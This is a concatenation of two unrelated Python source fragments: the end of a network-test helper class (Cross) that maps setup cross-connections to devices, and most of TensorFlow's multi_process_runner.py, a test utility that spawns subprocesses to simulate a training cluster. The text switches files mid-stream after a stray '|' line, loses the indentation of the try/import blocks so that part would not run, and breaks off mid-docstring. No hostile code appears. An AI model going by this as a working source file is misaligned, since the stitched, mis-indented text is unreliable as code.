                    # Search for link in setup. Compare links by devices ID
                    if [setup_link[0], setup_link[2]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
                        link_id += 1
                        # Append ports
                        ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[1])
                    elif [setup_link[2], setup_link[0]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
                        link_id += 1
                        ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[3])
        self.class_logger.debug("Got the following ports: %s." % (ports, ))
        return ports
class Cross(dict):
    """New interface to cross object without device id.

    Maps real cross-device ids (inherited from ``env.cross``) to cross objects
    and resolves which device owns a given connection, so callers can
    connect/disconnect links without knowing device ids up front.
    """

    def __init__(self, setup, env):
        """Initialize Cross class.

        Args:
            setup(dict): Setup configuration; ``setup['cross']`` maps cross ids
                to lists of connections in format [sw1, port1, sw2, port2].
            env: Environment object; if it has a ``cross`` attribute, its
                items are copied into this dict.
        """
        super(Cross, self).__init__()
        self.setup = setup
        self.env = env
        # Copy existing cross objects keyed by their real device id.
        if hasattr(env, "cross"):
            for key, value in list(env.cross.items()):
                self[key] = value

    def get_device_id(self, connection):
        """Search device in setup object by given connection.

        Args:
            connection(list): Connection info in format [sw1, port1, sw2, port2]

        Raises:
            Exception: no device in connection

        Returns:
            int: device id which own connection
        """
        # A link may be listed in either direction in the setup, so also try
        # the reversed [sw2, port2, sw1, port1] form.
        connection_reverse = connection[2:] + connection[:2]
        try:
            match = next(cross_id for cross_id, crosses in self.setup['cross'].items()
                         if connection in crosses or connection_reverse in crosses)
            # dicts preserve insertion order (guaranteed since Python 3.7), so
            # the position of the matched section within setup['cross'] is
            # stable; the returned id is its 1-based position. NOTE(review):
            # this assumes keys in self (from env.cross) are 1-based positional
            # ids matching setup['cross'] order — confirm against env config.
            return list(self.setup['cross'].keys()).index(match) + 1
        except StopIteration:
            raise Exception("Can not find device with such connection: %s in config" % connection)

    def xconnect(self, connection):
        """Wrapper for xconnect method defined in xconnect.py module.

        Args:
            connection(list): Connection info in format [sw1, port1, sw2, port2]
        """
        id_real_device = self.get_device_id(connection)
        return self[id_real_device].xconnect(connection)

    def xdisconnect(self, connection):
        """Wrapper for xdisconnect method defined in xconnect.py module.

        Args:
            connection(list): in format [sw1, port1, sw2, port2]
        """
        id_real_device = self.get_device_id(connection)
        return self[id_real_device].xdisconnect(connection)

    def cross_connect(self, conn_list):
        """Wrapper for cross_connect method defined in xconnect.py module.

        Args:
            conn_list(list[list]): List of connections

        Raises:
            Exception: conn_list is empty
        """
        if conn_list:
            # NOTE(review): only the first connection is forwarded; any further
            # entries in conn_list are silently ignored. cross_disconnect below
            # forwards the whole list instead — confirm which is intended.
            connection = conn_list[0]
            id_real_device = self.get_device_id(connection)
            return self[id_real_device].cross_connect([connection])
        else:
            raise Exception("conn_list is empty")

    def cross_disconnect(self, disconn_list):
        """Wrapper for cross_disconnect method defined in xconnect.py module.

        Args:
            disconn_list(list[list]): List of connections

        Raises:
            Exception: disconn_list is empty
        """
        if disconn_list:
            # The owning device is resolved from the first connection only, but
            # the full list is forwarded to that device's cross_disconnect.
            connection = disconn_list[0]
            id_real_device = self.get_device_id(connection)
            return self[id_real_device].cross_disconnect(disconn_list)
        else:
            raise Exception("disconn_list is empty")

    def get_connection(self, dev_id, port_no):
        """Get connection for device port.

        Args:
            dev_id(str): Device ID/autoname/linkname ('tg1')
            port_no(int): Device port number.

        Raises:
            Exception: no connection for current port

        Returns:
            list: Connection info
        """
        # Get device
        device_id = self.env.get_device_id(dev_id)
        dev_obj = self.env.id_map[device_id]
        # Get port_id from port_no
        port_id = dev_obj.ports.index(port_no)
        # Check for connection in setup
        connection = None
        for device in self.setup['cross']:
            for conn in self.setup['cross'][device]:
                # conn ports appear to be 1-based while port_id is a 0-based
                # list index, hence the "- 1" — TODO confirm against setup spec.
                if (device_id == conn[0] and port_id == conn[1] - 1) or (device_id == conn[2] and port_id == conn[3] - 1):
                    connection = conn
                    # NOTE(review): this break exits only the inner loop; the
                    # outer loop keeps scanning other cross sections and a
                    # later match would overwrite `connection`. Harmless if a
                    # port appears in at most one section — verify.
                    break
        if connection is None:
            raise Exception("Port {0} on device {1} is not used in current setup.".format(port_no, dev_id))
        # dev_id has to be source
        if connection[0] != device_id:
            connection = connection[2:] + connection[:2]
        return connection

    def device_port_disconnect(self, dev_id, port_no):
        """Connect/Disconnect device port.

        Args:
            dev_id(str): Device ID/autoname/linkname ('tg1')
            port_no(int): Device port number.
        """
        # Get connection
        connection = self.get_connection(dev_id, port_no)
        # Emulate port disconnection
        self.cross_disconnect([connection, ])

    def device_port_connect(self, dev_id, port_no):
        """Connect/Disconnect device port.

        Args:
            dev_id(str): Device ID/autoname/linkname ('tg1')
            port_no(int): Device port number.
        """
        # Get connection
        connection = self.get_connection(dev_id, port_no)
        # Emulate port connection
        self.cross_connect([connection, ])
|
multi_process_runner.py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When is_successful
# attribute is True, the subprocess has ended successfully, or if False, the
# exception stack trace info is stored in exc_info to pass on to parent process
# to be re-raised.
_ProcessStatusInfo = collections.namedtuple(
    '_ProcessStatusInfo', ['is_successful', 'exc_info', 'return_value'])

# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
                                                  ['return_value', 'stdout'])

# Per-subprocess environment description: the task's role in the cluster plus
# which TF modes (v2 / eager) to replicate from the parent process.
TestEnvironment = collections.namedtuple('TestEnvironment', [
    'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
    'v2_enabled', 'executing_eagerly'
])

# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
    'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])

# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
class MultiProcessRunner(object):
  """A utility class to start multiple processes to simulate a cluster.

  We need to use multiple processes to simulate a cluster in TF 2.0 tests
  because TF 2.0 has some process-global data structures that have to be
  separated by processes. We also need child processes to test out our fault
  tolerance because shutting down a standard TensorFlow server within its
  process is not supported.

  Note: the main test program that uses this runner class must run main program
  via `test_main` defined in this file. Using this runner in non-test binaries
  is not supported yet.

  This class is not thread-safe. Child processes will inherit TF2 behavior flag.
  """

  def __init__(self,
               proc_func,
               cluster_spec,
               rpc_layer=None,
               max_run_time=None,
               grpc_fail_fast=None,
               stream_stdout=True,
               list_stdout=False,
               use_dill_for_args=True,
               daemon=False,
               args=None,
               kwargs=None):
    """Creates a multi-process runner.

    Args:
      proc_func: Function to be run on child processes. This will be run on
        processes for all task types.
      cluster_spec: Dict for cluster spec. The following is an example of
        cluster with three workers and two ps's.
        {"worker": ["worker0.example.com:2222",
                    "worker1.example.com:2222",
                    "worker2.example.com:2222"],
         "ps": ["ps0.example.com:2222",
                "ps1.example.com:2222"]}
      rpc_layer: RPC layer to use. Default value is 'grpc+loas'.
      max_run_time: If set, child processes is forced to exit at approximately
        this many seconds after `start` is called. We achieve this through
        `signal.alarm()` api. Note that this is best effort at Python level
        since Python signal handler does not get executed when it runs lower
        level C/C++ code. So it can be delayed for arbitrarily long time.
      grpc_fail_fast: Whether GRPC connection between processes should fail
        without retrying. Defaults to None, in which case the environment
        variable is not explicitly set.
      stream_stdout: True if the output/error from the subprocesses should be
        streamed to be printed in parent process' log. Defaults to True.
      list_stdout: True if the output/error from the subprocesses should be
        collected to be attached to the resulting `MultiProcessRunnerResult`
        returned from `MultiProcessRunner.join()`. If True, the list of stdout
        can be retrieved via `MultiProcessRunnerResult.stdout` attribute.
        Defaults to False.
      use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
        can pickle more objects, but doesn't work with types in
        `multiprocessing` library like `Mutex`.
      daemon: Whether to start processes as daemons.
      args: Positional arguments to be sent to functions run on processes.
      kwargs: Keyword arguments to be sent to functions run on processes.

    Raises:
      RuntimeError: if `multi_process_runner.test_main()` is not called.
      ValueError: if there are more than one chief in the `cluster_spec`.
    """
    assert cluster_spec is not None
    if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
      raise ValueError('If chief exists in the cluster, there must be at most '
                       'one chief. Current `cluster_spec` has {} chiefs.'
                       .format(len(cluster_spec['chief'])))
    if not multi_process_lib.initialized():
      raise RuntimeError('`multi_process_runner` is not initialized. '
                         'Please call `multi_process_runner.test_main()` '
                         'within `if __name__ == \'__main__\':` block '
                         'in your python module to properly initialize '
                         '`multi_process_runner`.')
    if not callable(proc_func):
      raise ValueError('proc_func is not a callable')
    self._proc_func = proc_func
    self._cluster_spec = cluster_spec
    self._rpc_layer = rpc_layer
    self._max_run_time = max_run_time
    self._grpc_fail_fast = grpc_fail_fast
    self._stream_stdout = stream_stdout
    # TODO(rchao): Revisit list_stdout argument to consider other solution.
    self._list_stdout = list_stdout
    # When True, `join` joins the chief first and then gives the remaining
    # processes a short grace period before force-terminating them.
    self._dependence_on_chief = True
    self._use_dill_for_args = use_dill_for_args
    self._daemon = daemon
    self._args = args or ()
    self._kwargs = kwargs or {}
    # Child processes should have the same v2 and eager behavior.
    self._v2_enabled = tf2.enabled()
    self._executing_eagerly = context.executing_eagerly()
    self._joined = False
    # Maps (task_type, task_id) -> _Process.
    self._processes = {}
    self._outstanding_subprocess_count = 0
    self._reading_threads = []
    self._manager = multiprocessing.Manager()
    self._process_status_queue = self._manager.Queue()
    self._parent_to_sub_queue = self._manager.Queue()
    # The barrier party size is the total number of tasks in the cluster.
    parties = sum(len(addresses) for addresses in self._cluster_spec.values())
    self._barrier = self._manager.Barrier(parties)
    # We use a queue to collect outputs from worker processes since it's thread
    # safe.
    self._streaming_queue = self._manager.Queue()
    # This flag will be set to True once terminate_all() is called.
    self._all_forced_terminated = False

  def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
    """Function to continuously read lines from subprocesses."""
    # closefd=False: the pipe's lifetime is managed by the Connection object,
    # not by this file wrapper.
    with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
      for line in reader:
        task_string = '[{}-{}]:'.format(task_type, task_id)
        formatted_line = '{} {}'.format(task_string.ljust(14), line)
        if self._stream_stdout:
          # TODO(rchao): Use a lock here to ensure the printed lines are not
          # broken.
          print(formatted_line, end='', flush=True)
        if self._list_stdout:
          self._streaming_queue.put(formatted_line)

  def _start_subprocess_and_reading_thread(self,
                                           task_type,
                                           task_id,
                                           cluster_spec=None,
                                           proc_func=None,
                                           args=None,
                                           kwargs=None):
    """Start a subprocess and a thread the reads lines from the subprocess."""
    if dill is None:
      raise unittest.SkipTest(
          'TODO(b/150264776): Resolve dependency issue in CI')
    test_env = TestEnvironment(
        task_type=task_type,
        task_id=task_id,
        cluster_spec=cluster_spec or self._cluster_spec,
        rpc_layer=self._rpc_layer,
        grpc_fail_fast=self._grpc_fail_fast,
        v2_enabled=self._v2_enabled,
        executing_eagerly=self._executing_eagerly,
    )
    pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
    resources = Resources(
        process_status_queue=self._process_status_queue,
        parent_to_sub_queue=self._parent_to_sub_queue,
        streaming_pipe_w=pipe_w,
        barrier=self._barrier,
    )
    if proc_func is None:
      proc_func, args, kwargs = self._proc_func, self._args, self._kwargs
    # Always use dill to pickle proc_func so that we support more callable
    # types, e.g. lambda.
    proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
    if self._use_dill_for_args:
      args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
      kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
    p = _Process(
        test_env=test_env,
        target=_ProcFunc(),
        args=(resources, test_env, proc_func, args, kwargs,
              self._use_dill_for_args),
        daemon=self._daemon)
    p.start()
    self._processes[(task_type, task_id)] = p
    self._outstanding_subprocess_count += 1
    # For each subprocess, we dedicate a thread continuously reading lines
    # from them.
    thread = threading.Thread(  # pylint: disable=unexpected-keyword-arg
        target=self._continuously_readline_from_sub,
        args=(pipe_r, task_type, task_id))
    thread.start()
    self._reading_threads.append(thread)

  def start(self):
    """Starts processes, one for each task in `cluster_spec`.

    Note that this is best effort by the applicable multiprocessing library,
    and it may take up to seconds for a subprocess to be successfully started.
    """
    if self._processes:
      raise ValueError('MultiProcessRunner already started.')
    for task_type, addresses in self._cluster_spec.items():
      for task_id, _ in enumerate(addresses):
        self._start_subprocess_and_reading_thread(task_type, task_id)
    # TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
    # without this the tests become very flaky.
    if self._max_run_time is not None:
      def handler(signum, frame):
        del signum, frame
        self.terminate_all()
      signal.signal(signal.SIGALRM, handler)
      signal.alarm(self._max_run_time)

  def start_in_process_as(self, as_task_type, as_task_id):
    """Start the processes, with the specified task run in main process.

    This is similar to `start()` except that the task with task_type
    `as_task_type` and task_id `as_task_id` is run in the main process.
    This method is particularly useful when debugging tool such as `pdb` is
    needed in some specific task. Note that since this method is blocking until
    that specific task exits, additional actions would need a thread to be
    called:

    ```python
    def proc_func():
      # user code to be run
      import pdb; pdb.set_trace()

    def follow_ups():
      time.sleep(5)
      mpr.start_single_process(
          task_type='evaluator',
          task_id=0)

    mpr = multi_process_runner.MultiProcessRunner(
        proc_func,
        multi_worker_test_base.create_cluster_spec(
            has_chief=True, num_workers=1))
    threading.Thread(target=follow_ups).start()
    mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
    mpr.join()
    ```

    Note that if `list_stdout=True`, the logs/stdout by task
    run by the main process is not available in result.stdout.

    Args:
      as_task_type: The task type to be run in the main process.
      as_task_id: The task id to be run in the main process.
    """
    if self._processes:
      raise ValueError('MultiProcessRunner already started.')
    for task_type, addresses in self._cluster_spec.items():
      for task_id, _ in enumerate(addresses):
        if not (task_type == as_task_type and task_id == as_task_id):
          self._start_subprocess_and_reading_thread(task_type, task_id)
    # The designated task runs inline: set TF_CONFIG and invoke proc_func
    # directly in this process (blocking until it returns).
    _set_tf_config(as_task_type, as_task_id, self._cluster_spec,
                   self._rpc_layer)
    self._proc_func(*self._args, **self._kwargs)

  def start_single_process(self,
                           task_type,
                           task_id,
                           cluster_spec=None,
                           proc_func=None,
                           args=None,
                           kwargs=None):
    """Starts a single process.

    This starts a process in the cluster with the task type, task id, and the
    process function (`proc_func`). If process function is `None`, the function
    provided at `__init__` will be used. If `cluster_spec` is `None`, the
    cluster spec provided at `__init__` will be used.

    TODO(rchao): It is meant that all subprocesses will be updated with the new
    cluster spec, but this has yet to be implemented. At this time only the
    newly started subprocess picks up this updated cluster spec.

    Args:
      task_type: The task type.
      task_id: The task id.
      cluster_spec: The cluster spec to be used on the newly started
        process. If `None`, the cluster spec provided at `__init__` will be
        used.
      proc_func: The process function to be run on the newly started
        process. If specified, specify `args` and `kwargs` as well. If `None`,
        the function provided at `__init__` will be used.
      args: Optional positional arguments to be supplied in `proc_func`.
      kwargs: Optional keyword arguments to be supplied in `proc_func`.
    """
    self._start_subprocess_and_reading_thread(
        task_type,
        task_id,
        cluster_spec=cluster_spec,
        proc_func=proc_func,
        args=args or (),
        kwargs=kwargs or {})

  def _queue_to_list(self, queue_to_convert):
    """Convert `queue.Queue` to `list`."""
    list_to_return = []
    # Calling `queue.empty()` is not reliable.
    while True:
      try:
        list_to_return.append(queue_to_convert.get(block=False))
      except Queue.Empty:
        break
    return list_to_return

  def get_process_id(self, task_type, task_id):
    """Returns the subprocess id given the task type and task id."""
    p = self._processes.get((task_type, task_id), None)
    return p.pid if p else None

  def _join_or_terminate(self, task_type, task_id, process, timeout):
    """Joins a process. If it times out, terminate all processes."""
    logging.info('joining %s-%d', task_type, task_id)
    process.join(timeout)
    # If exitcode is None, the process wasn't terminated and this is a
    # timeout.
    if process.exitcode is None:
      # Force termination to dump worker processes stack trace.
      self.terminate_all(sig=signal.SIGTERM)
      process_statuses = self._queue_to_list(self._process_status_queue)
      raise SubprocessTimeoutError(
          '%s-%d and possibly more subprocesses timed out.' %
          (task_type, task_id), self._get_mpr_result(process_statuses))

  def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
    """Joins all the processes with timeout.

    Args:
      timeout: if set and not all processes report status within roughly
        `timeout` seconds, a `SubprocessTimeoutError` exception will be raised.

    Returns:
      A MultiProcessRunnerResult object, which has two attributes,
      `return_value` and `stdout`. `return_value` always contains the return
      values from the subprocesses. If `list_stdout` argument is True at
      `__init__`, `stdout` is available that contains a list of all messages
      from subprocesses' stdout and stderr.

    Raises:
      SubprocessTimeoutError: if not all processes report status approximately
        within `timeout` seconds. When this is raised, a
        `MultiProcessRunnerResult` object can be retrieved by
        `SubprocessTimeoutError`'s mpr_result attribute, which has the same
        structure as above 'Returns' section describes.
      Exception: if there is an Exception propagated from any subprocess.
    """
    if self._joined:
      raise ValueError("MultiProcessRunner can't be joined twice.")
    self._joined = True
    chief = self._processes.get(('chief', 0), None)
    if self._dependence_on_chief and chief:
      self._join_or_terminate('chief', 0, chief, timeout)
      # Give other processes a chance to exit on their own.
      for p in self._processes.values():
        p.join(timeout=3)
      self.terminate_all()
    else:
      for (task_type, task_id), p in self._processes.items():
        self._join_or_terminate(task_type, task_id, p, timeout)
    for (task_type, task_id), p in self._processes.items():
      logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
    process_statuses = self._queue_to_list(self._process_status_queue)
    # When processes were force-terminated, missing statuses are expected;
    # otherwise every subprocess must have reported one.
    if not self._all_forced_terminated and len(
        process_statuses) != self._outstanding_subprocess_count:
      raise RuntimeError(
          'missing statuses from %d subproceses.' %
          (self._outstanding_subprocess_count - len(process_statuses)))
    for process_status in process_statuses:
      assert isinstance(process_status, _ProcessStatusInfo)
      if not process_status.is_successful:
        six.reraise(*process_status.exc_info)
    logging.info('Joining log reading threads.')
    for thread in self._reading_threads:
      thread.join()
    logging.info('Joined log reading threads.')
    # Clear the alarm.
    signal.alarm(0)
    return self._get_mpr_result(process_statuses)

  def _get_mpr_result(self, process_statuses):
    """Builds a `MultiProcessRunnerResult` from collected statuses."""
    stdout = self._queue_to_list(self._streaming_queue)
    return_values = []
    for process_status in process_statuses:
      if process_status.return_value is not None:
        return_values.append(process_status.return_value)
    return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)

  def terminate(self, task_type, task_id):
    """Terminates the process with `task_type` and `task_id`."""
    p = self._processes.get((task_type, task_id), None)
    if p is None:
      raise ValueError('{}-{} does not exist'.format(task_type, task_id))
    # TODO(crccw): change to use Process.terminate() as well.
    self._parent_to_sub_queue.put('terminate {} {}'.format(task_type, task_id))
    p.join()

  def terminate_all(self, sig=None):
    """Terminates all subprocesses."""
    # Use SIGKILL as default. In systems where that's unavailable such as
    # windows, use SIGTERM.
    sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
    for (task_type, task_id), p in self._processes.items():
      try:
        os.kill(p.pid, sig)
      except ProcessLookupError:
        logging.info('Attempting to kill %s-%d but it does not exist.',
                     task_type, task_id)
    self._all_forced_terminated = True
class _Process(multi_process_lib.Process):
  """A modified `multiprocessing.Process` that can set up environment variables."""

  # TODO(crccw): consider moving other logics in _ProcFunc to _Process.
  def __init__(self, test_env, **kwargs):
    super(_Process, self).__init__(**kwargs)
    self._test_env = test_env
    # Rebind run() so that environment variables are exported in the child
    # process before any user code executes.
    self._actual_run = getattr(self, 'run')
    self.run = self._run_with_setenv

  def _run_with_setenv(self):
    """Exports GRPC_FAIL_FAST / TF_CONFIG, then delegates to the original run()."""
    # We need to set environment variables before doing anything because
    # setenv() is not thread-safe.
    test_env = self._test_env
    if test_env.grpc_fail_fast is not None:
      os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
    _set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
                   test_env.rpc_layer)
    return self._actual_run()
class _ProcFunc(object):
  """Represents a callable to run in a subprocess."""

  @contextlib.contextmanager
  def _runtime_mode(self, executing_eagerly):
    """Context manager entering eager or graph mode to mirror the parent."""
    if executing_eagerly:
      with context.eager_mode():
        yield
    else:
      with context.graph_mode():
        yield

  def _message_checking_func(self, task_type, task_id):
    """A function that regularly checks messages from parent process."""
    # TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
    while True:
      try:
        message = self._resources.parent_to_sub_queue.get(block=False)
        # Currently the only possible message is termination.
        if not message.startswith('terminate'):
          raise ValueError('Unrecognized message: {}'.format(message))
        if message == 'terminate {} {}'.format(task_type, task_id):
          break
        else:
          # If the message is not targeting this process, put it back to the
          # queue.
          self._resources.parent_to_sub_queue.put(message)
          time.sleep(1)
      except Queue.Empty:
        time.sleep(0.1)
    # Report success before exiting: a requested termination is not a failure.
    self._resources.process_status_queue.put(
        _ProcessStatusInfo(
            is_successful=True,
            exc_info=None,
            return_value=None))
    # `os._exit(0)` is used to more reliably terminate a subprocess.
    os._exit(0)  # pylint: disable=protected-access

  def _close_streaming(self):
    """Close stdout, stderr and streaming pipe.

    We need to explicitly close them since Tensorflow may take a while to exit,
    so that the reading threads in the main process can exit more quickly.
    """
    sys.stdout.flush()
    sys.stderr.flush()
    sys.stdout.close()
    sys.stderr.close()
    self._resources.streaming_pipe_w.close()

  def __call__(self, resources, test_env, proc_func, args, kwargs,
               use_dill_for_args):
    """The wrapper function that actually gets run in child process(es)."""
    global _barrier

    self._resources = resources
    _barrier = self._resources.barrier
    proc_func = dill.loads(proc_func)
    if use_dill_for_args:
      args = dill.loads(args)
      kwargs = dill.loads(kwargs)

    if faulthandler is not None:
      faulthandler.enable()
      faulthandler.register(signal.SIGTERM, chain=True)

    # All logging should go to stderr to be streamed to the main process.
    logging.set_stderrthreshold(logging.DEBUG)

    # Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
    # print() and logging.*() write directly to `streaming_pipe_w`.
    # Unfortunately since we cannot prepend task_type and task_id information to
    # the streamed logs we will need a thread per subprocess to distinguish
    # where the piece of message is from.
    os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
    os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())

    pid = os.getpid()
    logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
                 test_env.task_type, test_env.task_id)

    # The thread will be dedicated to checking messages from the parent process.
    threading.Thread(  # pylint: disable=unexpected-keyword-arg
        target=self._message_checking_func,
        args=(test_env.task_type, test_env.task_id),
        daemon=True).start()

    if test_env.v2_enabled:
      v2_compat.enable_v2_behavior()

    with self._runtime_mode(test_env.executing_eagerly):
      info = _run_contained(proc_func, args, kwargs)
      self._resources.process_status_queue.put(info)

      # Re-raise the exception in addition to reporting it to the parent
      # process, so that even if `--test_timeout` flag is set and the
      # error doesn't make it to be shown in parent process before bazel's
      # timeout, the log would still show what happens in this subprocess,
      # instead of silently suppressing the error due to early bazel
      # timeout. Raising an error in the subprocess produces stack trace in
      # the log, but the program continues running.
      if not info.is_successful:
        six.reraise(*info.exc_info)

      self._close_streaming()
class MultiProcessPoolRunner(object):
  """A utility class to start a process pool to simulate a cluster.

  It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
  expensive initialization cost of Tensorflow.
  """

  def __init__(self, cluster_spec, initializer=None):
    """Creates a multi-process pool runner.

    Args:
      cluster_spec: Dict for cluster spec. The following is an example of
        cluster with three workers.
        {"worker": ["worker0.example.com:2222",
                    "worker1.example.com:2222",
                    "worker2.example.com:2222"]}
      initializer: a callable to called at the startup of worker processes.

    Raises:
      RuntimeError: if `multi_process_runner.test_main()` is not called.
      ValueError: if there are more than one chief in the `cluster_spec`.
    """
    self._cluster_spec = cluster_spec
    self._initializer = initializer
    # Maps (task_type, task_id) -> parent end of the worker's Pipe.
    self._conn = {}
    self._runner = None

  def __del__(self):
    """Best-effort cleanup of connections and the underlying runner."""
    self._reset()

  def _reset(self):
    """Closes all worker connections and joins the runner, if started."""
    for conn in self._conn.values():
      conn.close()
    self._conn = {}
    if self._runner is not None:
      self._runner.join()
      self._runner = None

  def _start(self):
    """Starts the worker pool."""
    # We need different arguments for different processes so we're passing a
    # no-op proc_func here and use start_single_process instead.
    #
    # We also need to start the process pool as daemon, so that they don't block
    # the program from exiting. Note that __del__ may not get called when
    # there's an exception. The user may also store a pool runner in a global
    # object to share across test cases
    self._runner = MultiProcessRunner(
        proc_func=lambda: None,
        cluster_spec=self._cluster_spec,
        use_dill_for_args=False,
        daemon=True)
    if self._initializer:
      initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
    else:
      initializer = None
    for task_type, addresses in self._cluster_spec.items():
      for task_id, _ in enumerate(addresses):
        conn1, conn2 = multiprocessing.Pipe(duplex=True)
        self._conn[(task_type, task_id)] = conn1
        self._runner.start_single_process(
            task_type,
            task_id,
            proc_func=_pool_runner_worker,
            args=(initializer, conn2))

  def run(self, proc_func, args=None, kwargs=None):
    """Runs `proc_func` with `args` and `kwargs` on all jobs.

    Args:
      proc_func: The function to be run.
      args: Optional positional arguments to be supplied in `proc_func`.
      kwargs: Optional keyword arguments to be supplied in `proc_func`.

    Returns:
      A list of return values.
    """
    if self._runner is None:
      self._start()

    # Since we start the processes as daemon they're going to be killed by
    # SIGTERM when the program exits. We only turn on streaming during run() to
    # avoid printing the stacktrace caused by the SIGTERM.
    self._runner._stream_stdout = True  # pylint: disable=protected-access

    try:
      proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
      for conn in self._conn.values():
        conn.send((proc_func, args or [], kwargs or {}))

      process_statuses = []
      for (task_type, task_id), conn in self._conn.items():
        logging.info('Waiting for the result from %s-%d', task_type, task_id)
        try:
          process_statuses.append(conn.recv())
        except EOFError:
          # This shouldn't happen due to exceptions in proc_func. This usually
          # means bugs in the runner.
          self._reset()
          raise RuntimeError('Unexpected EOF. Worker process may have died. '
                             'Please report a bug')

      return_values = []
      for process_status in process_statuses:
        assert isinstance(process_status, _ProcessStatusInfo)
        if not process_status.is_successful:
          six.reraise(*process_status.exc_info)
        if process_status.return_value is not None:
          return_values.append(process_status.return_value)
      return return_values
    finally:
      self._runner._stream_stdout = False  # pylint: disable=protected-access
def _pool_runner_worker(initializer, conn):
  """Worker loop executed inside each pool process.

  Runs the optional startup `initializer`, then serves requests: each message
  received on `conn` is a (pickled proc_func, args, kwargs) triple, which is
  executed and whose `_ProcessStatusInfo` result (including any captured
  exception) is sent back. The loop ends when `conn` is closed by the parent.

  Args:
    initializer: A dill-pickled callable to execute during startup, or None.
    conn: A multiprocessing.Connection object to listen for tasks and send
      results.
  """
  if initializer:
    startup_fn = dill.loads(initializer)
    startup_fn()
  while True:
    try:
      payload = conn.recv()
    except EOFError:
      # Parent closed its end: no more work will arrive.
      break
    pickled_fn, call_args, call_kwargs = payload
    task_fn = dill.loads(pickled_fn)
    status = _run_contained(task_fn, call_args, call_kwargs)
    # Flush so streamed output reaches the parent before the result does.
    sys.stdout.flush()
    sys.stderr.flush()
    conn.send(status)
def _run_contained(proc_func, args, kwargs):
  """Runs `proc_func` with `args` and `kwargs`, capturing the outcome.

  Instead of letting an exception propagate, the result (return value or
  exception info) is packaged into a `_ProcessStatusInfo`.

  Args:
    proc_func: The function to be run.
    args: Optional positional arguments to be supplied in `proc_func`.
    kwargs: Optional keyword arguments to be supplied in `proc_func`.

  Returns:
    a _ProcessStatusInfo.
  """
  try:
    result = proc_func(*args, **kwargs)
    succeeded = True
    captured_exc = None
  except Exception:  # pylint: disable=broad-except
    result = None
    succeeded = False
    captured_exc = sys.exc_info()
  finally:
    # Deliberate return-from-finally: the status object is always produced,
    # even when an exception was caught above.
    return _ProcessStatusInfo(  # pylint: disable=lost-exception
        is_successful=succeeded,
        exc_info=captured_exc,
        return_value=result)
class SubprocessTimeoutError(RuntimeError):
  """Raised when at least one subprocess fails to report status in time.

  The partial run result is preserved: a `MultiProcessRunnerResult` object is
  available through the `mpr_result` attribute. See
  `MultiProcessRunner.join()` for more information.
  """

  def __init__(self, msg, mpr_result):
    super(SubprocessTimeoutError, self).__init__(msg)
    # Partial results collected up to the point of the timeout.
    self.mpr_result = mpr_result
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
  """Set TF_CONFIG environment variable.

  Serializes the cluster spec and this task's identity (and the RPC layer,
